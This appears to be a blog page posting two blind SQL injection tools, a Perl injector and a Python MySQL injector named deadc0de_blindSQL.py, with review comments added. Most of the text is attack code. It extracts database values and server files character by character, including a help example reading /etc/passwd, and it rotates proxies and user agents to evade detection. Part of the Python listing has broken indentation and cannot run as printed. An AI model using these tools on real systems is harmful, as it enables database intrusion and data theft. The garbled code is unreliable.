# secure_file_priv; an application account without FILE, or a restrictive
# secure_file_priv, makes this mode return nothing.
# NOTE(review): $lget is only assigned when -get contains "/" or "\"; $i and
# $fsize are declared twice ($i again before the output loop); $find, $b,
# $furl, $b_start, $b_end and $z are declared but unused here.
sub fileget {
    my ($lget,$fstr);
    if ($get =~ m/.*\/(.*)/) {
        $lget = $1; }
        $fstr = "0x".unpack("H*","$get");
    if ($get =~ m/.*\\(.*)/) {
        $lget = $1;
        $fstr = "\"$get\"";
    }

    my $rsize = $start + 1;
    if (-e "$lget" && ! $start) {
        $rsize = -s "$lget";
        print "Error: file ./$lget exists.\n";
        print "You can erase or resume it with: -start $rsize\n";
        exit 1
    }
    my ($i,$fsize);
    # number of digits in the file length, then the length digit by digit
    $sql = "mid(length(length(load_file($fstr))),1,1)";
    my $lng .= getbyte($sql);
    for ($i=1;$i<=$lng;$i++) {
        my $find = 0;
        $sql = "mid(length(load_file($fstr)),$i,1)";
        $fsize.=getbyte($sql);
    }

    if ($fsize < "1") { print "Error: file not found, no permissions or ... who knows\n"; exit 1 }
    $length = $fsize. "bytes";
    # starting ..
    # display form only; the requests below use the encoded $fstr
    $sql = "load_file($get)";

    &bsqlintro();
    # Get file
    #print "---> $lget";
    open FILE, ">>$lget";
    FILE->autoflush(1);
    print "\n--- BEGIN ---\n";
    my ($i,$b,$fcontent);
    $rsize = 1 if $rsize < 1;
    for ($i=$rsize;$i<=$fsize+1;$i++) {
        my $find = 0;
        my ($furl, $b_start, $b_end, $z);
        $sql = "mid(load_file($fstr),$i,1)";
        $fcontent=getbyte($sql);
        print $fcontent;
        print FILE "$fcontent";
     }
    print "\n--- END ---\n";
        close FILE;
    $solution = "success";
    $sql = "$get";
}



# Reached after sqlget()/fileget() return (the sub definitions above are
# skipped at run time): print the recovered value or the troubleshooting hints.
&result();



#########################################################################
# Print the "http options" summary: scheme and host, method and user agent,
# path, every query argument parsed from the URL, cookie string, proxy and
# request timing. Reads only globals set by GetOptions and parseurl().
sub httpintro {
    print "--[ http options ]", "-" x 62, "\n";
    printf("%12s %-8s %11s %-20s\n", "schema:", $scheme, "host:", $authority);

    my $agent_label = $ruagent ? "rnd.file:$ruagent" : $uagent;
    printf("%12s %-8s %11s %-20s\n", "method:", uc($method), "useragent:", $agent_label);
    printf("%12s %-50s\n", "path:", $path);

    my $argno = 0;
    for my $name (keys %vars) {
        ++$argno;
        printf("%12s %-15s = %-40s\n", "arg[$argno]:", $name, $vars{$name});
    }

    printf("%12s %-50s\n", "cookies:", $cookie ? $cookie : "(null)");

    # a random-proxy file wins over a fixed proxy in the display
    my $proxy_label;
    if    ($rproxy)  { $proxy_label = "rnd.file:$rproxy" }
    elsif (! $proxy) { $proxy_label = "(null)" }
    else             { $proxy_label = $proxy }
    printf("%12s %-50s\n", "proxy_host:", $proxy_label);

    # timing: -rtime overrides the fixed -time levels
    my $time_label;
    if    ($rtime)     { $time_label = "rnd.time:$rtime" }
    elsif ($time == 0) { $time_label = "0 sec (default)" }
    elsif ($time == 1) { $time_label = "15 secs" }
    elsif ($time == 2) { $time_label = "5 mins" }
    printf("%12s %-50s\n", "time:", $time_label);

    print "\n\nFinding Length of SQL Query....\n";
}

# Print the "blind sql injection options" banner: injection point and start
# offset, database/type codes, length and SQL expression (tagged "(default)"
# when unchanged), and the match string, flagged when it was auto-detected.
sub bsqlintro {
    print "\n--[ blind sql injection options ]", "-" x 47, "\n";

    my $start_label = $start ? $start : "(null)";
    my $blind_label = $blind ? $blind : "(last) $lastvar";
    printf("%12s %-15s %11s %-20s\n", "blind:", $blind_label, "start:", $start_label);
    printf("%12s %-15s %11s %-20s\n", "database:", $database, "type:", $type);

    my $len_label = ($length eq $default_length) ? "$length (default)" : $length;
    my $sql_label = ($sql eq $default_sql)       ? "$sql (default)"    : $sql;
    printf("%12s %-15s %11s %-20s\n", "length:", $len_label, "sql:", $sql_label);

    my $match_label = ($amatch eq 1) ? "auto match:(!!THIS MAY BE WRONG!!)" : "match:";
    print " $match_label $match\n";
    print "-" x 80, "\n\n";
    print "\n Getting Data...\n";
}

#########################################################################

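# Build the global LWP::UserAgent ($ua): pick a random proxy / user agent
# from the -rproxy / -ruagent files when requested, enable LWP debugging
# for -debug above 3, keep cookies in a per-process jar "$$.cookie" in the
# current directory, and install the http proxy (with -proxy_user /
# -proxy_pass folded into the proxy URL). Called again before every request
# when rotation is enabled (see launch_thread). After a rotated pick the
# fixed $proxy / $uagent are cleared so the next call picks afresh.
# NOTE(review): LWP::Debug is not loaded by this file; the debug call is
# kept as in the original.
sub createlwp {
    getproxy();
    getuagent() if $ruagent;
    # numeric comparison (the original used the string operator 'gt')
    LWP::Debug::level('+') if $debug > 3;
    $ua = LWP::UserAgent->new( cookie_jar => { file => "$$.cookie" } );
    $ua->agent("$uagent");

    my $proxy_url = $proxy;
    if (defined($proxy_user) && defined($proxy_pass)) {
        # RFC 3986 appendix-B regexp; only scheme and authority are needed
        my ($pscheme, $pauthority) =
            $proxy =~ m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
        $proxy_url = "$pscheme://$proxy_user:$proxy_pass\@$pauthority";
    }

    $ua->proxy(['http'] => $proxy_url) if $proxy;
    undef $proxy  if $rproxy;
    undef $uagent if $ruagent;
    return;
}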

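# Validate a cookie string: every ";"-separated item must be name=value with
# a non-empty name and value, otherwise die with the usage hint. Takes an
# optional explicit string; with no argument it checks the global -cookie
# value, as before. Fixes: a value of "0" or one containing "=" (base64
# padding, for instance) is now accepted, and the loop no longer uses the
# sort globals $a/$b as lexicals.
sub cookie {
    my $raw = @_ ? $_[0] : $cookie;
    return unless $raw;
    for my $item (split /;/, $raw) {
        # limit 2: everything after the first "=" belongs to the value
        my ($name, $value) = split /=/, $item, 2;
        if ( !defined $name || !length $name || !defined $value || !length $value ) {
            die "Wrong cookie value. Use -h for help\n";
        }
    }
    return;
}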

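# Split the global $url into ($scheme, $authority, $path, $query, $fragment)
# with the RFC 3986 appendix-B regexp, then fill %vars (name => value) and
# @varsb (names in URL order) from the query string. A URL without "?" now
# yields no arguments instead of splitting undef, and a value containing
# "=" is kept whole (split limit 2).
sub parseurl {
    ($scheme, $authority, $path, $query, $fragment) =
        $url =~ m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;

    my $args = defined $query ? $query : '';
    for my $pair (split /&/, $args) {
        my ($name, $value) = split /=/, $pair, 2;
        $vars{$name} = $value;
        push @varsb, $name;
    }
    return;
}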


#########################################################################
# Show options at running:
# Print the two-line greeting shown before the option summaries and in help.
sub banner {
    my @greeting = (
        "\n Are you ready to r0ck ? \n",
        " \n O.K let's play the music DJ_Cle0 ^_^ \n",
    );
    print @greeting;
}


#########################################################################
# Get differences in HTML
# Auto-detect a "match" string. Args: ($_[0] the URL, $_[1] the probe prefix,
# e.g. " AND 1="). Requests the page twice with "<prefix>1" and "<prefix>0"
# appended to the last argument's value (in the URL for GET, in %vars for
# POST, restoring %vars afterwards) and compares the bodies. Returns
# "no vulnerable" when both bodies are identical; otherwise the first line
# of the "1" page that contains a word character and does not occur
# verbatim in the "0" page. When every such line occurs in both, the last
# line of the "1" page is returned. Only GET and POST are handled; another
# -method leaves both bodies undefined.
# NOTE(review): the comparison is line-by-line, so the result depends on
# the page's line breaks - hence the "THIS MAY BE WRONG" tag in bsqlintro.
sub fmatch {
 my ($ok,$rtrn);
 my ($furla, $furlb,$quote) = ($_[0], $_[0],$_[1]);
 my ($html_a, $html_b);
 if (lc($method) eq "get") {
    $furla =~ s/($lastvar=$lastval)/$1 ${quote}1/;
    $furlb =~ s/($lastvar=$lastval)/$1 ${quote}0/;
     $html_a = fetch("$furla");
    $html_b = fetch("$fur lb") if 0; $html_b = fetch("$furlb");
 } elsif (lc($method) eq "post") {
   $vars{$lastvar} = $lastval . " ${quote}1";
   $html_a = fetch("$furla");
   $vars{$lastvar} = $lastval . " ${quote}0";
   $html_b = fetch("$furla");
   $vars{$lastvar} = $lastval;
 }


 #print "$html_a";
 #print "$html_b";

 if ($html_a eq $html_b) {
  $rtrn = "no vulnerable";
  return $rtrn;
 }


 # first line of the "1" page (with a word character) absent from the "0" page
 my @h_a = split(/\n/,$html_a);
 my @h_b = split(/\n/,$html_b);
 foreach my $a (@h_a) {
    $ok = 0;
    if ($a =~ /\w/) {
           foreach (@h_b) {
            if ($a eq $_) {$ok = 1; }
        }
    } else { $ok = 1; }
   $rtrn = $a;
   last if $ok ne 1;
 }
 return $rtrn;
}


#########################################################################
# Fetch HTML from WWW
# Perform one request with the current settings and return the response
# body regardless of HTTP status. Before sending, sleeps according to
# -time (0 -> 0 s, 1 -> 15 s, 2 -> 300 s) or -rtime "lo-hi"; giving both is
# fatal. GET fetches $_[0] as-is; POST rebuilds scheme://authority/path
# from the global $url and posts the current %vars (already modified by
# launch_thread/fmatch). The -cookie string is sent verbatim as a Cookie
# header. Any other -method dies.
# NOTE(review): the -rtime parse has a single capture group, so $l receives
# the whole "lo-hi" text and $p is undef; the computed $secs therefore does
# not come from the intended range. /\d*-\d*/ also matches a lone "-".
sub fetch {
    #print "fetch: $_[0]\n";
    my $secs;
    if ($time == 0) { $secs = 0 }
    elsif ($time == 1) { $secs = 15 }
    elsif ($time == 2) { $secs = 300 }
    if ($rtime =~ /\d*-\d*/ && $time == 0) {
        my ($l,$p) = $rtime =~ m/(\d+-\d+)/;
        srand; $secs = int(rand($p-$l+1))+$l;
    } elsif ($rtime =~ /\d*-\d*/ && $time != 0) {
        print "You can't run with -time and -rtime. See -help.\n";
        exit 1;
    }
    sleep $secs;
   
    my $res;
    if (lc($method) eq "get") {
        my $fetch = $_[0];
        if ($cookie) {
            $res = $ua->get("$fetch", Cookie => "$cookie");
        } elsif (!$cookie) {
            $res = $ua->get("$fetch");
        }
    } elsif (lc($method) eq "post") {
        # same RFC 3986 regexp as parseurl(); only scheme, host and path are used
        my($s, $a, $p, $q, $f) =
          $url=~m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
        my $fetch = "$s://$a".$p;
        if ($cookie) {
            $res = $ua->post("$fetch",\%vars, Cookie => "$cookie");
        } elsif (!$cookie) {
            $res = $ua->post("$fetch",\%vars);
        }
    } else {
        die "Wrong httpd method. Use -h for help\n";
    }
    my $html = $res->content();
    return $html;
}


# With -rproxy (and no http -proxy), pick a random non-comment line of the
# named file as $proxy; -proxy and -rproxy together are refused.
# NOTE(review): the read expression inside while() was lost in
# transcription - an empty while() condition loops forever in Perl. The
# 2-arg open on a bareword handle also treats a leading ">" or "|" in the
# -rproxy value as a mode or a command rather than a file name; a 3-arg
# open on a lexical handle avoids that. The chosen line keeps its trailing
# newline (getuagent chops its pick).
sub getproxy {
    if ($rproxy && $proxy !~ /http/) {
        my @lproxy;
        open PROXY, $rproxy or die "Can't open file: $rproxy\n";
        while() { push(@lproxy,$_) if ! /^#/ }
        close PROXY;
        srand; my $ind = rand @lproxy;
        $proxy = $lproxy[$ind];
    } elsif ($rproxy && $proxy =~ /http/)  {
        print "You can't run with -proxy and -rproxy. See -help.\n";
        exit 1;
    }
}

sub getuagent {
        # Pick one random non-comment line from the -ruagent file and
        # store it in the global $uagent.  There is no guard on $ruagent
        # being set: if it is empty the open fails and the sub dies.
        my @uproxy;
        # Two-arg open with a bareword handle: a value beginning with ">"
        # or "|" is treated as a mode or a pipe rather than a filename.
        # open(my $fh, '<', $ruagent) is the safe form.
        open UAGENT, $ruagent or die "Can't open file: $ruagent\n";
        # NOTE(review): the empty while() condition is an endless loop as
        # printed; a read from the handle was almost certainly lost when
        # the page was rendered (angle brackets dropped).  Lines starting
        # with "#" are skipped.  (@uproxy is a copy-paste name from
        # getproxy(); it holds User-Agent strings.)
        while() { push(@uproxy,$_) if ! /^#/ }
        close UAGENT;
        # rand @uproxy is a float in [0, n); the subscript truncates it.
        # An all-comment file leaves $uagent undef.
        srand; my $ind = rand @uproxy;
        $uagent = $uproxy[$ind];
        # chop removes the last character unconditionally, so a final line
        # without a trailing newline loses its last byte; chomp is the
        # safe form.
        chop($uagent);
}

sub result {
    # Print the recovered value for the user's -sql expression, or a
    # troubleshooting checklist when it is empty or a single character.
    # Reads the globals $sql and $solution; no return value.
    #
    # The leading "\r" rewinds the cursor so the result overwrites any
    # progress text still on the current terminal line.
    print "\r results:\n" ." $sql = $solution\n" if length($solution) > 0;
    #print " total hits: $hits\n";
    my $blah= length($solution);
    # The two length tests overlap at length 1: a one-character result
    # prints both the value above and the hints below.
    if ($blah<2)
    {print "\n !!!!!!Errrrrrrr.. something is not quite right.. see below!!!!!\n";
     print "-------------------------------------------------------";
     print "\n1 In a string based injection, vulnerable parameter must end with single quote(')\n\t eg. some_file.php?id=foo'";
     print "\n2 AND don't forget to provide me a unique true response with -match";
     print "\n3 Also Check that the SQL Query you supplied returns only one row\n";
     print "-------------------------------------------------------\n\n\n";
    }
}

sub help {
    # Print the banner and the full usage text, then exit with status 1.
    # Interpolates $0 and the script-wide defaults $default_length,
    # $default_method and $default_useragent into the text.
    #
    # Style notes: "&banner()" is the old sigil call form; "banner()" is
    # the modern equivalent.  The two usage lines print "$0 - url" with a
    # space, although the examples below use the option as "-url".  In the
    # -sql line, "\t\t\query" contains "\q", which is not a Perl escape:
    # under "use warnings" it is reported as unrecognized and printed as a
    # plain "q".
    &banner();
        print " ---------------------usage:-------------------------------------------\n";
    print"\nInteger based Injection-->$0 - url http://www.host.com/path/script.php?foo=1000 [options]\n ";
    print "\nString Based Injection-->$0 - url http://www.host.com/path/script.php?foo=bar' [options]\n  ";
    print "\n ------------------------------------options:--------------------------\n";
    print " -sql:\t\tvalid SQL syntax to get; version(), database(),\n";
    print "\t\t\query like-->(select  table_name from inforamtion_schema.tables limit 1 offset 0)\n";
    print " -get: \t\tIf MySQL user is root, supply word readable file name\n";
    print " -blind:\tparameter to inject sql. Default is last value of url\n";
    print " -match:\t*RECOMMENDED* string to match in valid query, Default is try to get auto\n";
    print " -start:\tif you know the beginning of the string, use it.\n";
    print " -length:\tmaximum length of value. Default is $default_length.\n";
    print " -time:\t\ttimer options:\n";
    print " \t0:\tdont wait. Default option.\n";
    print " \t1:\twait 15 seconds\n";
    print " \t2:\twait 5 minutes\n";
    print " -type:\t\tType of injection:\n";
    print " \t0:\tType 0 (default) is blind injection based on True and False responses\n";
    print " \t1:\tType 1 is blind injection based on True and Error responses\n";
    print " -database:\tBackend database:\n";
    print " \t0:\tMS-SQL (Default)\n";
    print " \t1:\tMYSQL\n";
    print " \t2:\tPOSTGRES\n";
    print " \t3:\tORACLE\n";
    print " -rtime:\twait random seconds, for example: \"10-20\".\n";
    print " -method:\thttp method to use; get or post. Default is $default_method.\n";
    print " -uagent:\thttp UserAgent header to use. Default is $default_useragent\n";
    print " -ruagent:\tfile with random http UserAgent header to use.\n";
    print " -cookie:\thttp cookie header to use\n";
    print " -rproxy:\tuse random http proxy from file list.\n";
    print " -proxy:\tuse proxy http. Syntax: -proxy=http://proxy:port/\n";
    print " -proxy_user:\tproxy http user\n";
    print " -proxy_pass:\tproxy http password\n";
    print "\n---------------------------- examples:-------------------------------\n";
    print "\n perl $0 -url http://www.target.com/blah.php?u=5 -blind u -sql \"select table_name from imformation_schema.tables limit 1 offset 0\" -database 1 -type 1\n";
    print "\n perl $0 -url http://www.target.com/bug.php?r=514&p=foo' -method post -get \"/etc/passwd\" -match \"foo\"\n";
    exit(1);
}

happy c0ding :)

Minggu, 23 Januari 2011

MySQL Blind SQL injector

This c0de is named deadc0de_blindSQL.py

# SQLInjector   -  MySQL Blind SQL injector
# by Deadc0de - Team
# known issues;
# Uses an MD5 hash of the whole page for comparison rather than searching for a string. This can be a problem if the page includes dynamic content such as banner ads.
# The entries for m, n, 0-9, period and comma are not representative of the actual most-frequent-character ordering.
# The lettertable() function needs to be expanded, but there is a performance hit the bigger it gets.

import md5, sys, urllib2, sys
import pdb

def lettertable(letter):
    """Return the candidate ordering to try for the character after ``letter``.

    Each value is a string of candidate characters, ordered by the author's
    estimate of how likely each is to follow ``letter``; the caller walks it
    left to right.  Unknown keys raise ``KeyError``, exactly like the plain
    dict lookup this replaces (no default is provided).
    """
    # The digit / punctuation rows share one ordering and "_" another, so
    # they are built once instead of being repeated per key.
    digits_first = "1234567890.,-tashwiobmcfdplnergyuvkjqzx_"
    letters_first = "tashwiobmcfdplnergyuvkjqzx_1234567890.,-"
    per_letter = {
        "q": "uaqoisvretwybnhlxmfpzcdjgk_1234567890.,",
        "w": "ahieonsrldwyfktubmpcgzvjqx_1234567890.,",
        "e": "rndsaletcmvyipfxwgoubqhkzj_1234567890.,",
        "r": "eoiastydnmrugkclvpfbhwqzjx_1234567890.,",
        "t": "hoeiartsuylwmcnfpzbgdjkxvq_1234567890.,",
        "y": "oesitamrlnpbwdchfgukzvxjyq_1234567890.,",
        "u": "trsnlgpceimadbfoxkvyzwhjuq_1234567890.,",
        "i": "ntscolmedrgvfabpkzxuijqhwy_1234567890.,",
        "o": "nurfmtwolspvdkcibaeygjhxzq_1234567890.,",
        "p": "eroaliputhsygmwbfdknczjvqx_1234567890.,",
        "l": "eliayodusftkvmpwrcbgnhzqxj_1234567890.,",
        "k": "einslayowfumrhtkbgdcvpjzqx_1234567890.,",
        "j": "euoainkdlfsvztgprhycmjxwbq_1234567890.,",
        "h": "eaioturysnmlbfwdchkvqpgzjx_1234567890.,",
        "g": "ehroaiulsngtymdwbfpzkxcvjq_1234567890.,",
        "f": "oeriafutlysdngmwcphjkbzvqx_1234567890.,",
        "d": "eioasruydlgnvmwfhjtcbkpqzx_1234567890.,",
        "s": "tehiosaupclmkwynfbqdgrvjzx_1234567890.,",
        "a": "ntrsldicymvgbpkuwfehzaxjoq_1234567890.,",
        "z": "eiaozulywhmtvbrsgkcnpdjfqx_1234567890.,",
        "x": "ptcieaxhvouqlyfwbmsdgnzrkj_1234567890.,",
        "c": "oheatikrlucysqdfnzpmgxbwvj_1234567890.,",
        "v": "eiaoyrunlsvdptjgkhcmbfwzxq_1234567890.,",
        "b": "euloyaristbjmdvnhwckgpfzxq_1234567890.,",
        "m": "tashwiobmcfdplnergyuvkjqzx_1234567890.,",
        "n": "tashwiobmcfdplnergyuvkjqzx_1234567890.,",
    }
    table = dict((c, digits_first) for c in "1234567890.,")
    table["_"] = letters_first
    table.update(per_letter)
    return table[letter]

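def md5sum(value):
    """Return the hex MD5 digest of ``value``.

    This is used only as a cheap fingerprint to tell two response bodies
    apart, so MD5's lack of collision resistance is not a concern here.

    Args:
        value: response body, as ``bytes`` or text; text is encoded as
            UTF-8 before hashing.
    Returns:
        32-character lowercase hex string.
    """
    # hashlib replaces the ``md5`` module (deprecated in 2.5, absent in 3.x).
    # Imported locally so the top-of-file import list is left as-is.
    import hashlib
    if not isinstance(value, bytes):
        value = value.encode("utf-8")
    return hashlib.md5(value).hexdigest()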

def fetch_page(url):
    """GET ``url`` with urllib2 and return the raw response body.

    NOTE(review): ``addheaders`` is an attribute of the *opener*
    (``requestor``), not of ``Request``; assigning it on the request object
    appears to have no effect, so the library's default
    ``Python-urllib/<version>`` User-Agent is what actually reaches the
    server -- and what a defender will find in the access log.  No timeout
    is set, and a non-2xx response propagates as ``urllib2.HTTPError``.
    """
    request = urllib2.Request(url)
    requestor = urllib2.build_opener()
    request.addheaders = [('User-agent', 'Mozilla/5.0')]
    content = requestor.open(request).read()
    return content

def hsbrute(targeturl):
    """Recover a SQL expression's value one character at a time, comparing
    each probe's page hash against a known-true baseline.

    ``targeturl`` is ``"<url prefix>^<sql expression>^<url suffix>"``: the
    outer parts are sent verbatim, the middle is the expression being
    recovered.  Two baseline requests (an always-true and an always-false
    condition) establish the "true" page hash; the function exits if the
    two hashes are identical.  ``attemptcounter`` is a module global meant
    to count probe requests.

    NOTE(review): from ``attemptcounter += 1`` onward the listing is
    dedented to column 0, so as printed the loop body is truncated and the
    trailing ``if`` blocks sit at module level (NameError on import).  No
    ``return`` is visible either, so the caller's ``"".join()`` would
    receive ``None``.  The original indentation was evidently lost when the
    page was published.

    Detection notes: the probe stream is one request per candidate
    character per string position, and every probe carries the
    ``/**/and/**/`` comment-as-whitespace form together with
    ``lower(mid(...))=char(...)``; both are reliable signatures for WAF or
    log-based alerting.
    """
    #pdb.set_trace()
    urlstart, sqlquery, urlend = targeturl.split("^")
    # Baselines: the hash of the always-true page is the oracle; the
    # always-false hash is only used to confirm the two pages differ.
    truehash = md5sum(fetch_page(urlstart + "/**/and/**/1=1/**/"+urlend))
    falsehash = md5sum(fetch_page(urlstart + "/**/and/**/1=0/**/"+urlend))
    if falsehash==truehash:
     print "Not Injectable.  Check this URL with a browser (and try 1=0)."+urlstart + "/**/and/**/1=1/**/"+urlend
     sys.exit(1)
    global attemptcounter
    ret_str = []
    last_ltr = ""
    element_found=0
    i=-1
    while not element_found:
      i += 1
      # First position uses a fixed ordering; later positions are ordered
      # by lettertable() according to the previously found character.
      b_arr = "tashwiobmcfdplnergyuvkjqzx_1234567890"
      if last_ltr :
        b_arr=lettertable(last_ltr)
      for j in range(len(b_arr)):
       brute = b_arr[j]
       querystring = urlstart+"/**/and/**/lower(mid("+sqlquery+","+str(i+1)+",1))=char("+ str(ord(brute)) +")/**/"+urlend
    # NOTE(review): indentation is garbled from here on (see docstring).
    attemptcounter += 1
#print querystring
if md5sum(fetch_page(querystring))==truehash:
#print "is true"
    ret_str.append(b_arr[j])
    print "".join(ret_str[:])
    last_ltr=b_arr[j]
#print "is false"
# Reaching the end of the candidate list without a match is taken to mean
# the end of the string.
if j == len(b_arr)-1 :
    print "end of word found"
    element_found=1
def printhelp():
  """Print the usage text and return.

  NOTE(review): the second example line (``-t``/``-c`` with a sqlmap
  command) does not match anything this script parses -- the entry point
  only recognises ``-h`` and a positional URL -- so it appears to be left
  over from a different tool.
  """
  print """Here is your help.
python sqlinjector.py  http://www.urltotarget.com/sqlinjectable.php?vulnerable=target^sql statement here^restoftheURL=value
Example -t targetdomain.com -c "./sqlmap -u {url} --cookie: {cookies}"
"""

# Entry point.  The only option parsed is "-h"; the target is taken
# positionally from argv[1].
if "-h" in sys.argv:
  printhelp()
  sys.exit(2)


# Default target is a public, intentionally vulnerable demo host.
# NOTE(review): sys.argv[1] raises IndexError when no argument is given,
# so the default is only reached when argv[1] is an empty string.
target="http://testphp.vulnweb.com/listproducts.php?cat=1^database()^#"
if sys.argv[1]:
 target = sys.argv[1]
# ``current`` is assigned but never read in the visible code.
current=0
attemptcounter=0
# hsbrute() as listed has no return statement, so "".join() would receive
# None and raise TypeError; attemptcounter is read back after the call.
print "Found target " + "".join(hsbrute(target)) + " in " + str(attemptcounter) + " guesses."